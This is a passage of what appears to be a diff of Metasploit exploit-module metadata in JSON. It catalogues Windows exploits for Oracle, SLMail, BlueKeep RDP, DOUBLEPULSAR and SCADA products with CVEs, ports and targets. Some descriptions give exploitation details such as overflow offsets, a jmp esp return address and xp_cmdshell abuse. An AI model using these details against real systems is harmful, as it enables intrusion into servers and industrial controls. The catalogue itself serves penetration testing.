Authenticated Arbitrary File Upload", - "fullname": "exploit/windows/nuuo/nuuo_cms_fu", - "aliases": [], - "rank": 0, - "disclosure_date": "2018-10-11", - "type": "exploit", - "author": [ - "Pedro Ribeiro " - ], - "description": "The COMMITCONFIG verb is used by a CMS client to upload and modify the configuration of the\n CMS Server.\n The vulnerability is in the \"FileName\" parameter, which accepts directory traversal (..\\..\\)\n characters. 
Therefore, this function can be abused to overwrite any files in the installation\n drive of CMS Server.\n\n This vulnerability is exploitable in CMS versions up to and including v2.4.\n\n This module will either use a provided session number (which can be guessed with an auxiliary\n module) or attempt to login using a provided username and password - it will also try the\n default credentials if nothing is provided.\n\n This module will overwrite the LicenseTool.dll file in the CMS Server installation. If the module\n fails to restore LicenseTool.dll then the installation will be corrupted and NCS Server will\n not execute successfully.", - "references": [ - "CVE-2018-17936", - "URL-https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02", - "URL-https://seclists.org/fulldisclosure/2019/Jan/51", - "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/NUUO/nuuo-cms-ownage.txt" - ], - "platform": "Windows", - "arch": "x86", - "rport": 5180, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Nuuo Central Management Server <= v2.4.0" - ], - "mod_time": "2022-01-13 18:54:56 +0000", - "path": "/modules/exploits/windows/nuuo/nuuo_cms_fu.rb", - "is_install_path": true, - "ref_name": "windows/nuuo/nuuo_cms_fu", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/nuuo/nuuo_cms_sqli": { - "name": "Nuuo Central Management Authenticated SQL Server SQLi", - "fullname": "exploit/windows/nuuo/nuuo_cms_sqli", - "aliases": [], - "rank": 300, - "disclosure_date": "2018-10-11", - "type": "exploit", - "author": [ - "Pedro Ribeiro " - ], - "description": "The Nuuo Central Management Server allows an authenticated user to query the state of the alarms.\n This functionality can be abused to inject SQL into the query. 
As SQL Server 2005 Express is\n installed by default, xp_cmdshell can be enabled and abused to achieve code execution.\n This module will either use a provided session number (which can be guessed with an auxiliary\n module) or attempt to login using a provided username and password - it will also try the\n default credentials if nothing is provided.", - "references": [ - "CVE-2018-18982", - "URL-https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02", - "URL-https://seclists.org/fulldisclosure/2019/Jan/51", - "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/NUUO/nuuo-cms-ownage.txt" - ], - "platform": "Windows", - "arch": "x86", - "rport": 5180, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Nuuo Central Management Server <= v2.10.0" - ], - "mod_time": "2022-01-13 18:54:56 +0000", - "path": "/modules/exploits/windows/nuuo/nuuo_cms_sqli.rb", - "is_install_path": true, - "ref_name": "windows/nuuo/nuuo_cms_sqli", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "SideEffects": [ - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/oracle/client_system_analyzer_upload": { - "name": "Oracle Database Client System Analyzer Arbitrary File Upload", - "fullname": "exploit/windows/oracle/client_system_analyzer_upload", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-01-18", - "type": "exploit", - "author": [ - "1c239c43f521145fa8385d64a9c32243", - "juan vazquez " - ], - "description": "This module exploits an arbitrary file upload vulnerability on the Client\n Analyzer component as included in Oracle Database 11g, which allows remote\n attackers to upload and execute arbitrary code. 
This module has been tested\n successfully on Oracle Database 11g 11.2.0.1.0 on Windows 2003 SP2, where execution\n through the Windows Management Instrumentation service has been used.", - "references": [ - "CVE-2010-3600", - "OSVDB-70546", - "BID-45883", - "ZDI-11-018", - "URL-http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html" - ], - "platform": "Windows", - "arch": "", - "rport": 1158, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Oracle Oracle11g 11.2.0.1.0 / Windows 2003 SP2" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/oracle/client_system_analyzer_upload.rb", - "is_install_path": true, - "ref_name": "windows/oracle/client_system_analyzer_upload", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/oracle/extjob": { - "name": "Oracle Job Scheduler Named Pipe Command Execution", - "fullname": "exploit/windows/oracle/extjob", - "aliases": [], - "rank": 600, - "disclosure_date": "2007-01-01", - "type": "exploit", - "author": [ - "David Litchfield", - "juan vazquez ", - "sinn3r " - ], - "description": "This module exploits the Oracle Job Scheduler to execute arbitrary commands. The Job\n Scheduler is implemented via the component extjob.exe which listens on a named pipe\n called \"orcljsex\" and execute arbitrary commands received over this channel via\n CreateProcess(). 
In order to connect to the Named Pipe remotely, SMB access is required.\n Note that the Job Scheduler is disabled in default installations.", - "references": [ - "URL-http://www.amazon.com/Oracle-Hackers-Handbook-Hacking-Defending/dp/0470080221" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/oracle/extjob.rb", - "is_install_path": true, - "ref_name": "windows/oracle/extjob", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/oracle/osb_ndmp_auth": { - "name": "Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow", - "fullname": "exploit/windows/oracle/osb_ndmp_auth", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-01-14", - "type": "exploit", - "author": [ - "MC " - ], - "description": "The module exploits a stack buffer overflow in Oracle Secure Backup.\n When sending a specially crafted NDMP_CONNECT_CLIENT_AUTH packet,\n an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2008-5444", - "OSVDB-51340", - "URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html" - ], - "platform": "Windows", - "arch": "", - "rport": 10000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Oracle Secure Backup 10.1.0.3 (Windows 2003 SP0/Windows XP SP3)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/oracle/osb_ndmp_auth.rb", - "is_install_path": true, - "ref_name": "windows/oracle/osb_ndmp_auth", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/oracle/tns_arguments": { - "name": "Oracle 8i TNS 
Listener (ARGUMENTS) Buffer Overflow", - "fullname": "exploit/windows/oracle/tns_arguments", - "aliases": [], - "rank": 400, - "disclosure_date": "2001-06-28", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Oracle 8i. When\n sending a specially crafted packet containing an overly long\n ARGUMENTS string to the TNS service, an attacker may be able\n to execute arbitrary code.", - "references": [ - "CVE-2001-0499", - "OSVDB-9427", - "BID-2941" - ], - "platform": "Windows", - "arch": "", - "rport": 1521, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Oracle 8.1.7.0.0 Standard Edition (Windows 2000)", - "Oracle 8.1.7.0.0 Standard Edition (Windows 2003)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/oracle/tns_arguments.rb", - "is_install_path": true, - "ref_name": "windows/oracle/tns_arguments", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/oracle/tns_auth_sesskey": { - "name": "Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow", - "fullname": "exploit/windows/oracle/tns_auth_sesskey", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-10-20", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a stack buffer overflow in Oracle. 
When\n sending a specially crafted packet containing a long AUTH_SESSKEY value\n to the TNS service, an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2009-1979", - "OSVDB-59110", - "BID-36747", - "URL-http://blogs.conus.info/node/28", - "URL-http://blogs.conus.info/node/35", - "URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2009.html" - ], - "platform": "Windows", - "arch": "", - "rport": 1521, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Oracle 10.2.0.1.0 Enterprise Edition", - "Oracle 10.2.0.4.0 Enterprise Edition" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/oracle/tns_auth_sesskey.rb", - "is_install_path": true, - "ref_name": "windows/oracle/tns_auth_sesskey", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/oracle/tns_service_name": { - "name": "Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow", - "fullname": "exploit/windows/oracle/tns_service_name", - "aliases": [], - "rank": 400, - "disclosure_date": "2002-05-27", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Oracle. 
When\n sending a specially crafted packet containing a long SERVICE_NAME\n to the TNS service, an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2002-0965", - "OSVDB-5041", - "BID-4845", - "URL-http://www.oracle.com/technology/deploy/security/pdf/net9_dos_alert.pdf" - ], - "platform": "Windows", - "arch": "", - "rport": 1521, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Oracle 8.1.7.0.0 Standard Edition (Windows 2000)", - "Oracle 8.1.7.0.0 Standard Edition (Windows 2003)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/oracle/tns_service_name.rb", - "is_install_path": true, - "ref_name": "windows/oracle/tns_service_name", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/pop3/seattlelab_pass": { - "name": "Seattle Lab Mail 5.5 POP3 Buffer Overflow", - "fullname": "exploit/windows/pop3/seattlelab_pass", - "aliases": [], - "rank": 500, - "disclosure_date": "2003-05-07", - "type": "exploit", - "author": [ - "stinko " - ], - "description": "There exists an unauthenticated buffer overflow vulnerability\n in the POP3 server of Seattle Lab Mail 5.5 when sending a password\n with excessive length.\n\n Successful exploitation should not crash either the\n service or the server; however, after initial use the\n port cannot be reused for successive exploitation until\n the service has been restarted. Consider using a command\n execution payload following the bind shell to restart\n the service if you need to reuse the same port.\n\n The overflow appears to occur in the debugging/error reporting\n section of the slmail.exe executable, and there are multiple\n offsets that will lead to successful exploitation. 
This exploit\n uses 2606, the offset that creates the smallest overall payload.\n The other offset is 4654.\n\n The return address is overwritten with a \"jmp esp\" call from the\n application library SLMFC.DLL found in %SYSTEM%\\system32\\. This\n return address works against all version of Windows and service packs.\n\n The last modification date on the library is dated 06/02/99. Assuming\n that the code where the overflow occurs has not changed in some time,\n prior version of SLMail may also be vulnerable with this exploit. The\n author has not been able to acquire older versions of SLMail for\n testing purposes. Please let us know if you were able to get this\n exploit working against other SLMail versions.", - "references": [ - "CVE-2003-0264", - "OSVDB-11975", - "BID-7519" - ], - "platform": "Windows", - "arch": "", - "rport": 110, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows NT/2000/XP/2003 (SLMail 5.5)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/pop3/seattlelab_pass.rb", - "is_install_path": true, - "ref_name": "windows/pop3/seattlelab_pass", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/postgres/postgres_payload": { - "name": "PostgreSQL for Microsoft Windows Payload Execution", - "fullname": "exploit/windows/postgres/postgres_payload", - "aliases": [], - "rank": 600, - "disclosure_date": "2009-04-10", - "type": "exploit", - "author": [ - "Bernardo Damele A. G. ", - "todb " - ], - "description": "On default Microsoft Windows installations of PostgreSQL the postgres\n service account may write to the current directory (which is usually\n \"C:\\Program Files\\PostgreSQL\\\\data\" where is the\n major.minor version of PostgreSQL). 
UDF DLL's may be sourced from\n there as well.\n\n This module uploads a Windows DLL file via the pg_largeobject method\n of binary injection and creates a UDF (user defined function) from\n that DLL. Because the payload is run from DllMain, it does not need to\n conform to specific Postgres API versions.", - "references": [ - "URL-https://web.archive.org/web/20100803002909/http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql" - ], - "platform": "Windows", - "arch": "", - "rport": 5432, - "autofilter_ports": [ - 5432 - ], - "autofilter_services": [ - "postgres" - ], - "targets": [ - "Windows x86", - "Windows x64" - ], - "mod_time": "2024-02-19 10:57:53 +0000", - "path": "/modules/exploits/windows/postgres/postgres_payload.rb", - "is_install_path": true, - "ref_name": "windows/postgres/postgres_payload", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "postgresql" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/proxy/bluecoat_winproxy_host": { - "name": "Blue Coat WinProxy Host Header Overflow", - "fullname": "exploit/windows/proxy/bluecoat_winproxy_host", - "aliases": [], - "rank": 500, - "disclosure_date": "2005-01-05", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in the Blue Coat Systems WinProxy\n service by sending a long port value for the Host header in a HTTP\n request.", - "references": [ - "CVE-2005-4085", - "OSVDB-22238", - "BID-16147", - "URL-http://www.bluecoat.com/support/knowledge/advisory_host_header_stack_overflow.html" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "WinProxy <= 6.1 R1a Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb", - "is_install_path": true, - "ref_name": "windows/proxy/bluecoat_winproxy_host", - "check": 
false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/proxy/ccproxy_telnet_ping": { - "name": "CCProxy Telnet Proxy Ping Overflow", - "fullname": "exploit/windows/proxy/ccproxy_telnet_ping", - "aliases": [], - "rank": 200, - "disclosure_date": "2004-11-11", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits the YoungZSoft CCProxy <= v6.2 suite\n Telnet service. The stack is overwritten when sending an overly\n long address to the 'ping' command.", - "references": [ - "CVE-2004-2416", - "OSVDB-11593", - "BID-11666", - "EDB-621" - ], - "platform": "Windows", - "arch": "x86", - "rport": 23, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows 2000 Pro All - English", - "Windows 2000 Pro All - Italian", - "Windows 2000 Pro All - French", - "Windows XP SP0/1 - English", - "Windows XP SP2 - English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb", - "is_install_path": true, - "ref_name": "windows/proxy/ccproxy_telnet_ping", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/proxy/proxypro_http_get": { - "name": "Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow", - "fullname": "exploit/windows/proxy/proxypro_http_get", - "aliases": [], - "rank": 500, - "disclosure_date": "2004-02-23", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Proxy-Pro Professional\n GateKeeper 4.7. 
By sending a long HTTP GET to the default port\n of 3128, a remote attacker could overflow a buffer and execute\n arbitrary code.", - "references": [ - "CVE-2004-0326", - "OSVDB-4027", - "BID-9716" - ], - "platform": "Windows", - "arch": "", - "rport": 3128, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Proxy-Pro GateKeeper 4.7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/proxy/proxypro_http_get.rb", - "is_install_path": true, - "ref_name": "windows/proxy/proxypro_http_get", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/proxy/qbik_wingate_wwwproxy": { - "name": "Qbik WinGate WWW Proxy Server URL Processing Overflow", - "fullname": "exploit/windows/proxy/qbik_wingate_wwwproxy", - "aliases": [], - "rank": 400, - "disclosure_date": "2006-06-07", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a stack buffer overflow in Qbik WinGate version\n 6.1.1.1077 and earlier. 
By sending malformed HTTP POST URL to the\n HTTP proxy service on port 80, a remote attacker could overflow\n a buffer and execute arbitrary code.", - "references": [ - "CVE-2006-2926", - "OSVDB-26214", - "BID-18312" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "WinGate 6.1.1.1077" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb", - "is_install_path": true, - "ref_name": "windows/proxy/qbik_wingate_wwwproxy", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/rdp/cve_2019_0708_bluekeep_rce": { - "name": "CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free", - "fullname": "exploit/windows/rdp/cve_2019_0708_bluekeep_rce", - "aliases": [], - "rank": 0, - "disclosure_date": "2019-05-14", - "type": "exploit", - "author": [ - "Sean Dillon ", - "Ryan Hanson", - "OJ Reeves ", - "Brent Cook " - ], - "description": "The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120,\n allowing a malformed Disconnect Provider Indication message to cause use-after-free.\n With a controllable data/size remote nonpaged pool spray, an indirect call gadget of\n the freed channel is used to achieve arbitrary code execution.\n\n Windows 7 SP1 and Windows Server 2008 R2 are the only currently supported targets.\n\n Windows 7 SP1 should be exploitable in its default configuration, assuming your target\n selection is correctly matched to the system's memory layout.\n\n HKLM\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Winstations\\RDP-Tcp\\fDisableCam\n *needs* to be set to 0 for exploitation to succeed against Windows Server 2008 R2.\n This is a non-standard configuration for normal servers, and the target will crash if\n the aforementioned Registry key is not set!\n\n If the target is 
crashing regardless, you will likely need to determine the non-paged\n pool base in kernel memory and set it as the GROOMBASE option.", - "references": [ - "CVE-2019-0708", - "URL-https://github.com/zerosum0x0/CVE-2019-0708", - "URL-https://zerosum0x0.blogspot.com/2019/11/fixing-remote-windows-kernel-payloads-meltdown.html" - ], - "platform": "Windows", - "arch": "", - "rport": 3389, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic targeting via fingerprinting", - "Windows 7 SP1 / 2008 R2 (6.1.7601 x64)", - "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)", - "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)", - "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)", - "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)", - "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)", - "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)", - "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)" - ], - "mod_time": "2023-07-14 12:46:26 +0000", - "path": "/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb", - "is_install_path": true, - "ref_name": "windows/rdp/cve_2019_0708_bluekeep_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "Bluekeep" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/rdp/rdp_doublepulsar_rce": { - "name": "RDP DOUBLEPULSAR Remote Code Execution", - "fullname": "exploit/windows/rdp/rdp_doublepulsar_rce", - "aliases": [], - "rank": 500, - "disclosure_date": "2017-04-14", - "type": "exploit", - "author": [ - "Equation Group", - "Shadow Brokers", - "Luke Jennings", - "wvu ", - "Tom Sellers", - "Spencer McIntyre" - ], - "description": "This module executes a Metasploit payload against the Equation Group's\n DOUBLEPULSAR implant for RDP.\n\n While this module primarily performs code execution against the implant,\n the \"Neutralize implant\" target allows you to disable the implant.", - "references": [ - 
"URL-https://github.com/countercept/doublepulsar-detection-script" - ], - "platform": "Windows", - "arch": "x64", - "rport": 3389, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Execute payload (x64)", - "Neutralize implant" - ], - "mod_time": "2023-09-15 16:42:03 +0000", - "path": "/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb", - "is_install_path": true, - "ref_name": "windows/rdp/rdp_doublepulsar_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "DOUBLEPULSAR" - ], - "RelatedModules": [ - "exploit/windows/smb/smb_doublepulsar_rce" - ], - "Stability": [ - "crash-os-down" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/sage/x3_adxsrv_auth_bypass_cmd_exec": { - "name": "Sage X3 Administration Service Authentication Bypass Command Execution", - "fullname": "exploit/windows/sage/x3_adxsrv_auth_bypass_cmd_exec", - "aliases": [], - "rank": 400, - "disclosure_date": "2021-07-07", - "type": "exploit", - "author": [ - "Jonathan Peterson ", - "Aaron Herndon" - ], - "description": "This module leverages an authentication bypass exploit within Sage X3 AdxSrv's administration\n protocol to execute arbitrary commands as SYSTEM against a Sage X3 Server running an\n available AdxAdmin service.", - "references": [ - "CVE-2020-7387", - "CVE-2020-7388", - "URL-https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/" - ], - "platform": "Windows", - "arch": "cmd, x86, x64", - "rport": 1818, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Command", - "Windows DLL", - "Windows Executable" - ], - "mod_time": "2021-08-27 17:15:33 +0000", - "path": "/modules/exploits/windows/sage/x3_adxsrv_auth_bypass_cmd_exec.rb", - "is_install_path": true, - "ref_name": "windows/sage/x3_adxsrv_auth_bypass_cmd_exec", - "check": true, - 
"post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "first-attempt-fail" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/scada/abb_wserver_exec": { - "name": "ABB MicroSCADA wserver.exe Remote Code Execution", - "fullname": "exploit/windows/scada/abb_wserver_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-04-05", - "type": "exploit", - "author": [ - "Brian Gorenc", - "juan vazquez " - ], - "description": "This module exploits a remote stack buffer overflow vulnerability in ABB MicroSCADA. The\n issue is due to the handling of unauthenticated EXECUTE operations on the wserver.exe\n component, which allows arbitrary commands. The component is disabled by default, but\n required when a project uses the SCIL function WORKSTATION_CALL.\n\n This module has been tested successfully on ABB MicroSCADA Pro SYS600 9.3 on\n Windows XP SP3 and Windows 7 SP1.", - "references": [ - "CVE-2019-5620", - "OSVDB-100324", - "ZDI-13-270", - "URL-https://library.e.abb.com/public/41ccfa8ccd0431e6c1257c1200395574/ABB_SoftwareVulnerabilityHandlingAdvisory_ABB-VU-PSAC-1MRS235805.pdf" - ], - "platform": "Windows", - "arch": "x86", - "rport": 12221, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "ABB MicroSCADA Pro SYS600 9.3" - ], - "mod_time": "2021-03-17 15:58:21 +0000", - "path": "/modules/exploits/windows/scada/abb_wserver_exec.rb", - "is_install_path": true, - "ref_name": "windows/scada/abb_wserver_exec", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/advantech_webaccess_dashboard_file_upload": { - "name": "Advantech WebAccess Dashboard Viewer uploadImageCommon Arbitrary File Upload", - "fullname": "exploit/windows/scada/advantech_webaccess_dashboard_file_upload", 
- "aliases": [], - "rank": 600, - "disclosure_date": "2016-02-05", - "type": "exploit", - "author": [ - "rgod", - "Zhou Yu <504137480@qq.com>", - "sinn3r " - ], - "description": "This module exploits an arbitrary file upload vulnerability found in Advantech WebAccess 8.0.\n\n This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations\n of Advantech WebAccess. Authentication is not required to exploit this vulnerability.\n\n The specific flaw exists within the WebAccess Dashboard Viewer. Insufficient validation within\n the uploadImageCommon function in the UploadAjaxAction script allows unauthenticated callers to\n upload arbitrary code (instead of an image) to the server, which will then be executed under the\n high-privilege context of the IIS AppPool.", - "references": [ - "CVE-2016-0854", - "ZDI-16-128", - "URL-https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Advantech WebAccess 8.0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb", - "is_install_path": true, - "ref_name": "windows/scada/advantech_webaccess_dashboard_file_upload", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/scada/advantech_webaccess_webvrpcs_bof": { - "name": "Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow", - "fullname": "exploit/windows/scada/advantech_webaccess_webvrpcs_bof", - "aliases": [], - "rank": 400, - "disclosure_date": "2017-11-02", - "type": "exploit", - "author": [ - "mr_me " - ], - "description": "This module exploits a stack buffer overflow in Advantech WebAccess 8.2.\n By sending a 
specially crafted DCERPC request, an attacker could overflow\n the buffer and execute arbitrary code.", - "references": [ - "ZDI-17-938", - "CVE-2017-14016", - "URL-https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02" - ], - "platform": "Windows", - "arch": "", - "rport": 4592, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/scada/advantech_webaccess_webvrpcs_bof.rb", - "is_install_path": true, - "ref_name": "windows/scada/advantech_webaccess_webvrpcs_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/citect_scada_odbc": { - "name": "CitectSCADA/CitectFacilities ODBC Buffer Overflow", - "fullname": "exploit/windows/scada/citect_scada_odbc", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-06-11", - "type": "exploit", - "author": [ - "KF ", - "aushack " - ], - "description": "This module exploits a stack buffer overflow in CitectSCADA's ODBC daemon.\n This has only been tested against Citect v5, v6 and v7.", - "references": [ - "CVE-2008-2639", - "BID-29634", - "OSVDB-46105", - "URL-http://www.coresecurity.com/content/citect-scada-odbc-service-vulnerability", - "URL-http://www.auscert.org.au/render.html?it=9433", - "URL-http://www.citect.com/documents/news_and_media/pr-citect-address-security.pdf" - ], - "platform": "Windows", - "arch": "", - "rport": 20222, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Citect32.exe v5.21 NT4", - "Citect32.exe v5.21 2K/XP", - "Citect32.exe v5.41-r0 NT4", - "Citect32.exe v5.41-r0 2K/XP", - "Citect32.exe v6.0-r0 2K/XP", - "CiExceptionMailer.dll v5.42 on XP Sp2 or SP3", - "CiExceptionMailer.dll v6.0-r0 on Server 2003 Sp2", - "CiExceptionMailer.dll v6.0-r0 on XP Sp2 or SP3", - "CiExceptionMailer.dll v6.10 
on XP Sp2 or SP3", - "CiExceptionMailer.dll v7.0-r0 on XP Sp2 or SP3", - "CiExceptionMailer.dll v7.0-r0 on 2003 Server SP1", - "CiExceptionMailer.dll v5.50-r0 XP SP2", - "CiExceptionMailer.dll v5.50-r0 2003 Server", - "Debug" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/scada/citect_scada_odbc.rb", - "is_install_path": true, - "ref_name": "windows/scada/citect_scada_odbc", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/codesys_gateway_server_traversal": { - "name": "SCADA 3S CoDeSys Gateway Server Directory Traversal", - "fullname": "exploit/windows/scada/codesys_gateway_server_traversal", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-02-02", - "type": "exploit", - "author": [ - "Enrique Sanchez " - ], - "description": "This module exploits a directory traversal vulnerability that allows arbitrary\n file creation, which can be used to execute a mof file in order to gain remote\n execution within the SCADA system.", - "references": [ - "CVE-2012-4705", - "OSVDB-90368", - "URL-http://ics-cert.us-cert.gov/pdf/ICSA-13-050-01-a.pdf" - ], - "platform": "Windows", - "arch": "", - "rport": 1211, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal S3 CoDeSyS < 2.3.9.27" - ], - "mod_time": "2023-03-22 12:52:15 +0000", - "path": "/modules/exploits/windows/scada/codesys_gateway_server_traversal.rb", - "is_install_path": true, - "ref_name": "windows/scada/codesys_gateway_server_traversal", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/scada/codesys_web_server": { - "name": "SCADA 3S CoDeSys CmpWebServer Stack Buffer Overflow", - "fullname": 
